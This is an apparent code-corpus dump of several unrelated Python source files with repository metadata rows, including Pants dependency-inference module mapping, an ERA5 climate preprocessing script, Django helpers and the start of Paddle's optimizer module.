cls, dict_: dict, include_empty: bool = False
) -> Dict[str, ClientRequestParameter]:
return (
{k: cls.create_from_dict(v, include_empty=include_empty) for k, v in dict_}
if dict_
else {}
)
@classmethod
def create_many_from_list(
cls, list_: list, include_empty: bool = False
) -> List[ClientRequestParameter]:
return (
[cls.create_from_dict(i, include_empty=include_empty) for i in list_]
if list_
else []
)
@classmethod
def create_from_any(
cls, any_: any, include_empty: bool = False, many: bool = False
) -> Union[
ClientRequestParameter,
List[ClientRequestParameter],
Dict[Any, ClientRequestParameter],
]:
if many:
if isinstance(any_, dict):
return cls.create_many_from_dict(any_, include_empty=include_empty)
elif isinstance(any_, list):
return cls.create_many_from_list(any_, include_empty=include_empty)
else:
raise ValueError()
else:
return cls.create_from_dict(any_, include_empty=include_empty)
@staticmethod
def get_field_info() -> Dict[str, str]:
return {
"currencyCode": "currency_code",
"language": "language",
"price": "price",
"region": "region",
}
@staticmethod
def get_required_map() -> Dict[str, bool]:
return {
"currencyCode": False,
"language": False,
"price": False,
"region": False,
}
# endregion static methods
| [
"[email protected]"
] | |
5a8d87c8871f4b5879836b466e7049fd661da1ea | ca23b411c8a046e98f64b81f6cba9e47783d2584 | /ncsnv3/main.py | d7a89ddfc89627cb854f233719729e3382012dce | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | pdybczak/google-research | 1fb370a6aa4820a42a5d417a1915687a00613f9c | 0714e9a5a3934d922c0b9dd017943a8e511eb5bc | refs/heads/master | 2023-03-05T23:16:11.246574 | 2021-01-04T11:30:28 | 2021-01-04T11:30:28 | 326,629,357 | 1 | 0 | Apache-2.0 | 2021-02-01T12:39:09 | 2021-01-04T09:17:36 | Jupyter Notebook | UTF-8 | Python | false | false | 1,580 | py | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Training and evaluation for NCSNv3."""
from . import ncsn_lib
from absl import app
from absl import flags
from ml_collections.config_flags import config_flags
import tensorflow as tf
FLAGS = flags.FLAGS
config_flags.DEFINE_config_file(
"config", None, "Training configuration.", lock_config=True)
flags.DEFINE_string("workdir", None, "Work unit directory.")
flags.DEFINE_string("mode", "train", "Running mode: train or eval")
flags.DEFINE_string("eval_folder", "eval",
"The folder name for storing evaluation results")
flags.mark_flags_as_required(["workdir", "config"])
def main(argv):
del argv
tf.config.experimental.set_visible_devices([], "GPU")
if FLAGS.mode == "train":
ncsn_lib.train(FLAGS.config, FLAGS.workdir)
elif FLAGS.mode == "eval":
ncsn_lib.evaluate(FLAGS.config, FLAGS.workdir, FLAGS.eval_folder)
else:
raise ValueError(f"Mode {FLAGS.mode} not recognized.")
if __name__ == "__main__":
app.run(main)
| [
"[email protected]"
] | |
20947ccf802631ec01474e52ab2310cf9b617690 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_redoubtable.py | 8645cb26ee8dbbcd8fcdc345eeb5befad16d369c | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py |
#calss header
class _REDOUBTABLE():
def __init__(self,):
self.name = "REDOUBTABLE"
self.definitions = [u'very strong, especially in character; producing respect and a little fear in others: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"[email protected]"
] | |
3f96d8878c3bb4206095f84b4f67f59194a2984b | 4af65b44b39816c7037ff928da1ae153f4d970e5 | /mud/thing.py | 37a9732599722b87d944c6e390898be6dba87f1c | [] | no_license | Cloudxtreme/mud-14 | 0745eda694ffeee79120fcfc82aab2da8b7a9655 | f02d4ca0e8360b0924b86a3da99e5230c3028642 | refs/heads/master | 2021-05-28T06:14:37.121028 | 2014-12-01T08:00:27 | 2014-12-01T08:00:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 132 | py | import mudclasses as mc
import event as evt
import english
from types import TupleType
# bug: permanence (sp?) is not yet handled
| [
"[email protected]"
] | |
948cfd26f6231d12a4463589a8d9322ffb687ebf | be5e5aebd753ed1f376dc18ce411f0fac6d2f762 | /natuurpunt_purchase_search/__init__.py | 1503b4c0ebedce5264569792216f47998b67fa9c | [] | no_license | smart-solution/natuurpunt-purchase | 7d9fcfdde769b6294d8dc705cecc99a177b4573c | 0ac94cb68cee4ef464158720e04007ee12036179 | refs/heads/master | 2021-05-22T04:43:21.594422 | 2020-11-02T13:32:27 | 2020-11-02T13:32:27 | 39,186,322 | 0 | 2 | null | 2020-11-02T13:32:28 | 2015-07-16T08:42:31 | Python | UTF-8 | Python | false | false | 926 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import natuurpunt_purchase_search
| [
"[email protected]"
] | |
cc8a8453dcbfc50cc508c0fffb18ca9c01acbe54 | 827b7ad1cdf882824bf13717bd0baa08cc852eaf | /src/python/pants/backend/python/dependency_inference/module_mapper.py | 868969ac95364e4b502388856523007bee7f3316 | [
"Apache-2.0"
] | permissive | cclauss/pants | e4be17df24c9a962a123b94c0782d0941862220a | 4f39186f780310e73a708b3b589635dfa2e09696 | refs/heads/main | 2023-03-31T10:07:13.165248 | 2021-04-02T19:04:58 | 2021-04-02T19:04:58 | 354,131,355 | 0 | 0 | Apache-2.0 | 2021-04-02T20:56:27 | 2021-04-02T20:56:26 | null | UTF-8 | Python | false | false | 17,912 | py | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PurePath
from typing import DefaultDict
from pants.backend.python.target_types import (
ModuleMappingField,
PythonRequirementsField,
PythonSources,
)
from pants.base.specs import AddressSpecs, DescendantAddresses
from pants.core.util_rules.stripped_source_files import StrippedSourceFileNames
from pants.engine.addresses import Address
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import ExplicitlyProvidedDependencies, SourcesPathsRequest, Targets
from pants.engine.unions import UnionMembership, UnionRule, union
from pants.util.docutil import bracketed_docs_url
from pants.util.frozendict import FrozenDict
from pants.util.logging import LogLevel
from pants.util.memo import memoized_method
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class PythonModule:
module: str
@classmethod
def create_from_stripped_path(cls, path: PurePath) -> PythonModule:
module_name_with_slashes = (
path.parent if path.name == "__init__.py" else path.with_suffix("")
)
return cls(module_name_with_slashes.as_posix().replace("/", "."))
# -----------------------------------------------------------------------------------------------
# First-party module mapping
# -----------------------------------------------------------------------------------------------
@dataclass(frozen=True)
class FirstPartyPythonMappingImpl:
"""A mapping of module names to owning addresses that a specific implementation adds for Python
import dependency inference.
For almost every implementation, there should only be one address per module to avoid ambiguity.
However, the built-in implementation allows for 2 addresses when `.pyi` type stubs are used.
All ambiguous modules must be added to `ambiguous_modules` and not be included in `mapping`.
"""
mapping: FrozenDict[str, tuple[Address, ...]]
ambiguous_modules: FrozenDict[str, tuple[Address, ...]]
@union
class FirstPartyPythonMappingImplMarker:
"""An entry point for a specific implementation of mapping module names to owning targets for
Python import dependency inference.
All implementations will be merged together. Any modules that show up in multiple
implementations will be marked ambiguous.
The addresses should all be file addresses, rather than BUILD addresses.
"""
@dataclass(frozen=True)
class FirstPartyPythonModuleMapping:
"""A merged mapping of module names to owning addresses.
This mapping may have been constructed from multiple distinct implementations, e.g.
implementations for each codegen backends.
"""
mapping: FrozenDict[str, tuple[Address, ...]]
ambiguous_modules: FrozenDict[str, tuple[Address, ...]]
def addresses_for_module(self, module: str) -> tuple[tuple[Address, ...], tuple[Address, ...]]:
"""Return all unambiguous and ambiguous addresses.
The unambiguous addresses should be 0-2, but not more. We only expect 2 if there is both an
implementation (.py) and type stub (.pyi) with the same module name.
"""
unambiguous = self.mapping.get(module, ())
ambiguous = self.ambiguous_modules.get(module, ())
if unambiguous or ambiguous:
return unambiguous, ambiguous
# If the module is not found, try the parent, if any. This is to accommodate `from`
# imports, where we don't care about the specific symbol, but only the module. For example,
# with `from my_project.app import App`, we only care about the `my_project.app` part.
#
# We do not look past the direct parent, as this could cause multiple ambiguous owners to
# be resolved. This contrasts with the third-party module mapping, which will try every
# ancestor.
if "." not in module:
return (), ()
parent_module = module.rsplit(".", maxsplit=1)[0]
unambiguous = self.mapping.get(parent_module, ())
ambiguous = self.ambiguous_modules.get(parent_module, ())
return unambiguous, ambiguous
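    # Illustrative example (hypothetical module and path): if `mapping` has the
    # key "project.app" (owned by the target for src/project/app.py), a lookup
    # of "project.app.App" misses the exact key but falls back to its direct
    # parent "project.app" and returns that owner, while
    # "project.app.util.helper" returns nothing because only one parent level
    # is tried.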
@rule(level=LogLevel.DEBUG)
async def merge_first_party_module_mappings(
union_membership: UnionMembership,
) -> FirstPartyPythonModuleMapping:
all_mappings = await MultiGet(
Get(
FirstPartyPythonMappingImpl,
FirstPartyPythonMappingImplMarker,
marker_cls(),
)
for marker_cls in union_membership.get(FirstPartyPythonMappingImplMarker)
)
# First, record all known ambiguous modules. We will need to check that an implementation's
# module is not ambiguous within another implementation.
modules_with_multiple_implementations: DefaultDict[str, set[Address]] = defaultdict(set)
for mapping_impl in all_mappings:
for module, addresses in mapping_impl.ambiguous_modules.items():
modules_with_multiple_implementations[module].update(addresses)
# Then, merge the unambiguous modules within each MappingImpls while checking for ambiguity
# across the other implementations.
modules_to_addresses: dict[str, tuple[Address, ...]] = {}
for mapping_impl in all_mappings:
for module, addresses in mapping_impl.mapping.items():
if module in modules_with_multiple_implementations:
modules_with_multiple_implementations[module].update(addresses)
elif module in modules_to_addresses:
modules_with_multiple_implementations[module].update(
{*modules_to_addresses[module], *addresses}
)
else:
modules_to_addresses[module] = addresses
# Finally, remove any newly ambiguous modules from the previous step.
for module in modules_with_multiple_implementations:
if module in modules_to_addresses:
modules_to_addresses.pop(module)
return FirstPartyPythonModuleMapping(
mapping=FrozenDict(sorted(modules_to_addresses.items())),
ambiguous_modules=FrozenDict(
(k, tuple(sorted(v))) for k, v in sorted(modules_with_multiple_implementations.items())
),
)
# This is only used to register our implementation with the plugin hook via unions. Note that we
# implement this like any other plugin implementation so that we can run them all in parallel.
class FirstPartyPythonTargetsMappingMarker(FirstPartyPythonMappingImplMarker):
pass
@rule(desc="Creating map of first party Python targets to Python modules", level=LogLevel.DEBUG)
async def map_first_party_python_targets_to_modules(
_: FirstPartyPythonTargetsMappingMarker,
) -> FirstPartyPythonMappingImpl:
all_expanded_targets = await Get(Targets, AddressSpecs([DescendantAddresses("")]))
python_targets = tuple(tgt for tgt in all_expanded_targets if tgt.has_field(PythonSources))
stripped_sources_per_target = await MultiGet(
Get(StrippedSourceFileNames, SourcesPathsRequest(tgt[PythonSources]))
for tgt in python_targets
)
modules_to_addresses: DefaultDict[str, list[Address]] = defaultdict(list)
modules_with_multiple_implementations: DefaultDict[str, set[Address]] = defaultdict(set)
for tgt, stripped_sources in zip(python_targets, stripped_sources_per_target):
for stripped_f in stripped_sources:
module = PythonModule.create_from_stripped_path(PurePath(stripped_f)).module
if module in modules_to_addresses:
# We check if one of the targets is an implementation (.py file) and the other is
# a type stub (.pyi file), which we allow. Otherwise, we have ambiguity.
either_targets_are_type_stubs = len(modules_to_addresses[module]) == 1 and (
tgt.address.filename.endswith(".pyi")
or modules_to_addresses[module][0].filename.endswith(".pyi")
)
if either_targets_are_type_stubs:
modules_to_addresses[module].append(tgt.address)
else:
modules_with_multiple_implementations[module].update(
{*modules_to_addresses[module], tgt.address}
)
else:
modules_to_addresses[module].append(tgt.address)
# Remove modules with ambiguous owners.
for module in modules_with_multiple_implementations:
modules_to_addresses.pop(module)
return FirstPartyPythonMappingImpl(
mapping=FrozenDict((k, tuple(sorted(v))) for k, v in sorted(modules_to_addresses.items())),
ambiguous_modules=FrozenDict(
(k, tuple(sorted(v))) for k, v in sorted(modules_with_multiple_implementations.items())
),
)
# -----------------------------------------------------------------------------------------------
# Third party module mapping
# -----------------------------------------------------------------------------------------------
@dataclass(frozen=True)
class ThirdPartyPythonModuleMapping:
mapping: FrozenDict[str, Address]
ambiguous_modules: FrozenDict[str, tuple[Address, ...]]
def address_for_module(self, module: str) -> tuple[Address | None, tuple[Address, ...]]:
"""Return the unambiguous owner (if any) and all ambiguous addresses."""
unambiguous = self.mapping.get(module)
ambiguous = self.ambiguous_modules.get(module, ())
if unambiguous or ambiguous:
return unambiguous, ambiguous
# If the module is not found, recursively try the ancestor modules, if any. For example,
# pants.task.task.Task -> pants.task.task -> pants.task -> pants
if "." not in module:
return None, ()
parent_module = module.rsplit(".", maxsplit=1)[0]
return self.address_for_module(parent_module)
@rule(desc="Creating map of third party targets to Python modules", level=LogLevel.DEBUG)
async def map_third_party_modules_to_addresses() -> ThirdPartyPythonModuleMapping:
all_targets = await Get(Targets, AddressSpecs([DescendantAddresses("")]))
modules_to_addresses: dict[str, Address] = {}
modules_with_multiple_owners: DefaultDict[str, set[Address]] = defaultdict(set)
for tgt in all_targets:
if not tgt.has_field(PythonRequirementsField):
continue
module_map = tgt.get(ModuleMappingField).value
for python_req in tgt[PythonRequirementsField].value:
modules = module_map.get(
python_req.project_name,
[python_req.project_name.lower().replace("-", "_")],
)
for module in modules:
if module in modules_to_addresses:
modules_with_multiple_owners[module].update(
{modules_to_addresses[module], tgt.address}
)
else:
modules_to_addresses[module] = tgt.address
# Remove modules with ambiguous owners.
for module in modules_with_multiple_owners:
modules_to_addresses.pop(module)
return ThirdPartyPythonModuleMapping(
mapping=FrozenDict(sorted(modules_to_addresses.items())),
ambiguous_modules=FrozenDict(
(k, tuple(sorted(v))) for k, v in sorted(modules_with_multiple_owners.items())
),
)
# -----------------------------------------------------------------------------------------------
# module -> owners
# -----------------------------------------------------------------------------------------------
@dataclass(frozen=True)
class PythonModuleOwners:
"""The target(s) that own a Python module.
If >1 targets own the same module, and they're implementations (vs .pyi type stubs), they will
be put into `ambiguous` instead of `unambiguous`. `unambiguous` should never be > 2.
"""
unambiguous: tuple[Address, ...]
ambiguous: tuple[Address, ...] = ()
def __post_init__(self) -> None:
if self.unambiguous and self.ambiguous:
raise AssertionError(
"A module has both unambiguous and ambiguous owners, which is a bug in the "
"dependency inference code. Please file a bug report at "
"https://github.com/pantsbuild/pants/issues/new."
)
@memoized_method
def _unambiguous_via_includes(
self, explicitly_provided: ExplicitlyProvidedDependencies
) -> bool:
# NB: `self.ambiguous` is always file addresses, but we allow for their original BUILD
# targets to disambiguate them.
disambiguation_candidates = {
*(addr.maybe_convert_to_build_target() for addr in self.ambiguous),
*self.ambiguous,
}
return bool(disambiguation_candidates.intersection(explicitly_provided.includes))
@memoized_method
def _remaining_after_ignores(
self, explicitly_provided: ExplicitlyProvidedDependencies
) -> set[Address]:
# NB: `self.ambiguous` is always file addresses, but we allow for their original BUILD
# targets to disambiguate them.
return {
addr
for addr in self.ambiguous
if addr not in explicitly_provided.ignores
and addr.maybe_convert_to_build_target() not in explicitly_provided.ignores
}
def maybe_warn_of_ambiguity(
self,
explicitly_provided_deps: ExplicitlyProvidedDependencies,
original_address: Address,
*,
context: str,
) -> None:
"""If the module is ambiguous and the user did not disambiguate via explicitly provided
dependencies, warn that dependency inference will not be used."""
if not self.ambiguous or self._unambiguous_via_includes(explicitly_provided_deps):
return
remaining_after_ignores = self._remaining_after_ignores(explicitly_provided_deps)
if len(remaining_after_ignores) <= 1:
return
logger.warning(
f"{context}, but Pants cannot safely infer a dependency because >1 target exports "
f"this module, so it is ambiguous which to use: "
f"{sorted(addr.spec for addr in remaining_after_ignores)}."
f"\n\nPlease explicitly include the dependency you want in the `dependencies` "
f"field of {original_address}, or ignore the ones you do not want by prefixing "
f"with `!` or `!!` so that <=1 targets are left."
f"\n\nAlternatively, you can remove the ambiguity by deleting/changing some of the "
f"targets so that only 1 target exports this module. Refer to "
f"{bracketed_docs_url('troubleshooting#import-errors-and-missing-dependencies')}."
)
def disambiguated_via_ignores(
self, explicitly_provided_deps: ExplicitlyProvidedDependencies
) -> Address | None:
"""If ignores in the `dependencies` field ignore all but one of the ambiguous owners, the
remaining owner becomes unambiguous."""
if not self.ambiguous or self._unambiguous_via_includes(explicitly_provided_deps):
return None
remaining_after_ignores = self._remaining_after_ignores(explicitly_provided_deps)
return list(remaining_after_ignores)[0] if len(remaining_after_ignores) == 1 else None
@rule
async def map_module_to_address(
module: PythonModule,
first_party_mapping: FirstPartyPythonModuleMapping,
third_party_mapping: ThirdPartyPythonModuleMapping,
) -> PythonModuleOwners:
third_party_address, third_party_ambiguous = third_party_mapping.address_for_module(
module.module
)
first_party_addresses, first_party_ambiguous = first_party_mapping.addresses_for_module(
module.module
)
# First, check if there was any ambiguity within the first-party or third-party mappings. Note
# that even if there's ambiguity purely within either third-party or first-party, all targets
# with that module become ambiguous.
if third_party_ambiguous or first_party_ambiguous:
ambiguous = {*third_party_ambiguous, *first_party_ambiguous, *first_party_addresses}
if third_party_address:
ambiguous.add(third_party_address)
return PythonModuleOwners((), ambiguous=tuple(sorted(ambiguous)))
# It's possible for a user to write type stubs (`.pyi` files) for their third-party
# dependencies. We check if that happened, but we're strict in validating that there is only a
# single third party address and a single first-party address referring to a `.pyi` file;
# otherwise, we have ambiguous implementations.
if third_party_address and not first_party_addresses:
return PythonModuleOwners((third_party_address,))
first_party_is_type_stub = len(first_party_addresses) == 1 and first_party_addresses[
0
].filename.endswith(".pyi")
if third_party_address and first_party_is_type_stub:
return PythonModuleOwners((third_party_address, *first_party_addresses))
# Else, we have ambiguity between the third-party and first-party addresses.
if third_party_address and first_party_addresses:
return PythonModuleOwners(
(), ambiguous=tuple(sorted((third_party_address, *first_party_addresses)))
)
# We're done with looking at third-party addresses, and now solely look at first-party, which
# was already validated for ambiguity.
if first_party_addresses:
return PythonModuleOwners(first_party_addresses)
return PythonModuleOwners(())
def rules():
return (
*collect_rules(),
UnionRule(FirstPartyPythonMappingImplMarker, FirstPartyPythonTargetsMappingMarker),
)
| [
"[email protected]"
] | |
8ee2d7c7cfec8a059e6c4f84dfb4a253e1464a52 | 89a90707983bdd1ae253f7c59cd4b7543c9eda7e | /python_cookbook/10/monkeypatching_modules_on_import1.py | 89edccaa9b169b1d124990a2c3e05dd183a7d93b | [] | no_license | timothyshull/python_reference_code | 692a7c29608cadfd46a6cc409a000023e95b9458 | f3e2205dd070fd3210316f5f470d371950945028 | refs/heads/master | 2021-01-22T20:44:07.018811 | 2017-03-17T19:17:22 | 2017-03-17T19:17:22 | 85,346,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | from postimport import when_imported
@when_imported('threading')
def warn_threads(mod):
print('Threads? Are you crazy?')
if __name__ == '__main__':
pass
| [
"[email protected]"
] | |
8fb6bfee4530acca0b7936e56a0c29ede098296b | 2be5b2a6f5172b37fde90b076504fa9fe4f93784 | /nosmsd/management/commands/nosmsd_incoming.py | a31a1677e93343f07145d84bad79c89cede66b3e | [] | no_license | pedrokiefer/nosmsd | 74b73e959b8482744531caf4f81e7515791a5ff3 | e69d7f55d54f0f5e85eec16cde6da0cb64d63b5c | refs/heads/master | 2021-01-14T13:17:11.680061 | 2014-11-25T13:34:31 | 2014-11-25T13:34:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | #!/usr/bin/env python
# encoding=utf-8
# maintainer: rgaudin
import sys
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils import translation
from nosmsd.nosmsd_incoming import handle as nohandle
class Command(BaseCommand):
def handle(self, *args, **options):
translation.activate(settings.DEFAULT_LOCALE)
args = (u"%s %s" % (sys.argv[0], u"nosmsd_incoming"),) + args
nohandle(*args, DJANGO=True)
translation.deactivate()
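# Illustrative invocation (hypothetical arguments): as a Django management
# command this would normally be run as
#   ./manage.py nosmsd_incoming <args supplied by the SMS daemon>
# which is why handle() rewrites argv[0] before delegating to
# nosmsd.nosmsd_incoming.handle().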
| [
"[email protected]"
] | |
28ef3309ea1c0af7d7c199ff4dfdcf9e68caf048 | 4254c7f88b95c7aec20979691aecf63053c97570 | /cfdm/core/bounds.py | b3d70390051fcf096b1fe5d9ae2ad1b2f42f5528 | [
"MIT"
] | permissive | cofinoa/cfdm | 2a1fc2069ef253c6eb4a71a4d1fa252295d9be1d | 1e074dbc28054780a9ec667d61b9098b94956ea6 | refs/heads/master | 2020-05-07T08:39:24.996138 | 2019-04-08T14:34:56 | 2019-04-08T14:34:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,016 | py | from builtins import super
from . import abstract
class Bounds(abstract.PropertiesData):
'''A cell bounds component of a coordinate or domain ancillary
construct of the CF data model.
An array of cell bounds spans the same domain axes as its coordinate
array, with the addition of an extra dimension whose size is that of
the number of vertices of each cell. This extra dimension does not
correspond to a domain axis construct since it does not relate to an
independent axis of the domain. Note that, for climatological time
axes, the bounds are interpreted in a special way indicated by the
cell method constructs.
.. versionadded:: 1.7.0
'''
def __init__(self, properties=None, data=None, source=None,
copy=True, _use_data=True):
'''**Initialization**
:Parameters:
properties: `dict`, optional
Set descriptive properties. The dictionary keys are property
names, with corresponding values. Ignored if the *source*
parameter is set.
*Parameter example:*
``properties={'standard_name': 'altitude'}``
Properties may also be set after initialisation with the
`set_properties` and `set_property` methods.
data: `Data`, optional
Set the data. Ignored if the *source* parameter is set.
The data also may be set after initialisation with the
`set_data` method.
source: optional
Override the *properties* and *data* parameters with
``source.properties()`` and ``source.get_data(None)``
respectively.
If *source* does not have one of these methods, then the
corresponding parameter is not set.
copy: `bool`, optional
If False then do not deep copy input parameters prior to
initialization. By default arguments are deep copied.
'''
super().__init__(properties=properties, data=data,
source=source, copy=copy)
#--- End: def
#--- End: class
| [
"[email protected]"
] | |
aaf0fcdaee70b39287fea8239def89eee1d419c9 | ba54b70f93fe7f9d114623d76b1ad3f88309d66f | /uvideo/forms.py | 99e3e96d880007e37a2d6a8887d3860983e0d765 | [] | no_license | loobinsk/newprj | 9769b2f26092ce7dd8612fce37adebb307b01b8b | c6aa6a46973fb46375f4b05a86fe76207a8ae16d | refs/heads/master | 2023-05-07T00:28:44.242163 | 2021-05-25T08:22:05 | 2021-05-25T08:22:05 | 370,617,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | #-*- coding: utf-8 -*-
from django import forms
from uvideo.models import UserVideo
from django.template import loader, Context
from gutils.forms import BootstrapFormMixin
class UploadVideoWidget(forms.HiddenInput):
def render(self, name, value, attrs=None):
tmpl = loader.get_template('uvideo/video-upload-input.html')
return tmpl.render(Context({
'input': super(UploadVideoWidget, self).render(name, value, attrs=None),
'id': name,
}))
class UserVideoForm(BootstrapFormMixin, forms.ModelForm):
class Meta:
model = UserVideo
fields = ['url']
| [
"[email protected]"
] | |
736e9e1a22663053a31a445dbb2ce7cecb2841c3 | 232fc2c14942d3e7e28877b502841e6f88696c1a | /ding/interaction/config/base.py | 446e260203ff8119d34f20748b6d29698b85da7d | [
"Apache-2.0"
] | permissive | shengxuesun/DI-engine | ebf84221b115b38b4b3fdf3079c66fe81d42d0f7 | eb483fa6e46602d58c8e7d2ca1e566adca28e703 | refs/heads/main | 2023-06-14T23:27:06.606334 | 2021-07-12T12:36:18 | 2021-07-12T12:36:18 | 385,454,483 | 1 | 0 | Apache-2.0 | 2021-07-13T02:56:27 | 2021-07-13T02:56:27 | null | UTF-8 | Python | false | false | 432 | py | # System configs
GLOBAL_HOST = '0.0.0.0'
LOCAL_HOST = '127.0.0.1'
# General request
DEFAULT_REQUEST_RETRIES = 5
DEFAULT_REQUEST_RETRY_WAITING = 1.0
# Slave configs
MIN_HEARTBEAT_SPAN = 0.2
DEFAULT_HEARTBEAT_SPAN = 3.0
DEFAULT_SLAVE_PORT = 7236
# Master configs
MIN_HEARTBEAT_CHECK_SPAN = 0.1
DEFAULT_HEARTBEAT_CHECK_SPAN = 1.0
DEFAULT_HEARTBEAT_TOLERANCE = 17.0
DEFAULT_MASTER_PORT = 7235
# Two-side configs
DEFAULT_CHANNEL = 0
| [
"[email protected]"
] | |
b2e4985b6430b407be3fe3d835729ebeb8aa2e69 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/era5_scripts/02_preprocessing/combine82/502-tideGauge.py | 658865e7aebe194e5247d2a059242aa96349e091 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,117 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 16 16:11:00 2020
--------------------------------------------
Load predictors for each TG and combine them
--------------------------------------------
@author: Michael Tadesse
"""
import os
import pandas as pd
#define directories
dir_in = '/lustre/fs0/home/mtadesse/eraFiveConcat'
dir_out = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
def combine():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
#cd to where the actual file is
os.chdir(dir_in)
x = 502
y = 503
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
#looping through each TG folder
os.chdir(tg_name)
#defining the path for each predictor
where = os.getcwd()
csv_path = {'slp' : os.path.join(where, 'slp.csv'),\
"wnd_u": os.path.join(where, 'wnd_u.csv'),\
'wnd_v' : os.path.join(where, 'wnd_v.csv')}
first = True
for pr in csv_path.keys():
print(tg_name, ' ', pr)
#read predictor
pred = pd.read_csv(csv_path[pr])
#remove unwanted columns
pred.drop(['Unnamed: 0', 'Unnamed: 0.1'], axis = 1, inplace=True)
#give predictor columns a name
pred_col = list(pred.columns)
for pp in range(len(pred_col)):
if pred_col[pp] == 'date':
continue
pred_col[pp] = pr + str(pred_col[pp])
pred.columns = pred_col
#merge all predictors
if first:
pred_combined = pred
first = False
else:
pred_combined = pd.merge(pred_combined, pred, on = 'date')
#saving pred_combined
os.chdir(dir_out)
pred_combined.to_csv('.'.join([tg_name, 'csv']))
os.chdir(dir_in)
print('\n')
#run script
combine()
| [
"[email protected]"
] | |
eb5d81611f58b26a2fceac11bd14ca8653373c86 | 18aee5d93a63eab684fe69e3aa0abd1372dd5d08 | /python/paddle/optimizer/optimizer.py | 5187a651b97830ab24fe04e8fa4ce452fea65510 | [
"Apache-2.0"
] | permissive | Shixiaowei02/Paddle | 8d049f4f29e281de2fb1ffcd143997c88078eadb | 3d4d995f26c48f7792b325806ec3d110fc59f6fc | refs/heads/develop | 2023-06-26T06:25:48.074273 | 2023-06-14T06:40:21 | 2023-06-14T06:40:21 | 174,320,213 | 2 | 1 | Apache-2.0 | 2022-12-28T05:14:30 | 2019-03-07T10:09:34 | C++ | UTF-8 | Python | false | false | 66,327 | py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from collections import defaultdict
import numpy as np
import paddle
import paddle.autograd as imperative_base
from paddle import _C_ops
from paddle.fluid import core
from paddle.fluid.framework import (
Variable,
_current_expected_place,
default_main_program,
device_guard,
in_dygraph_mode,
name_scope,
)
from paddle.regularizer import L2Decay
from ..fluid import framework, unique_name
from ..fluid.backward import _get_no_grad_set_name, append_backward
from ..fluid.framework import Parameter, program_guard
from ..fluid.layer_helper import LayerHelper
from .lr import LRScheduler
__all__ = []
@framework.static_only
def append_backward_new(
loss_list,
parameter_list=None,
no_grad_set=None,
callbacks=None,
checkpoints=None,
distop_context=None,
):
from paddle.incubate.autograd.primx import Transform, orig2prim
program = default_main_program()
assert (
program.num_blocks == 1
), "The append_backward_new interface is designed to process only one block."
block = program.current_block()
for el in loss_list:
assert (
el.block == block
), 'variable in loss_list should be in current block of main program'
orig2prim(block)
ad = Transform(block)
if parameter_list is None:
parameter_list = program.global_block().all_parameters()
param_dot, loss_dot = ad.linearize(parameter_list, loss_list)
loss_bar, param_bar = ad.transpose(loss_dot, param_dot)
# remove param_dot and their constructor ops
op_indexes = []
for var in param_dot:
if var is not None:
op_index = block.ops.index(var.op)
assert op_index >= 0
op_indexes.append(op_index)
ad.erase_ops(sorted(op_indexes))
ad.erase_dots(param_dot)
if len(parameter_list) == 1:
params_and_grads = [(parameter_list, param_bar)]
else:
params_and_grads = []
for i, param in enumerate(parameter_list):
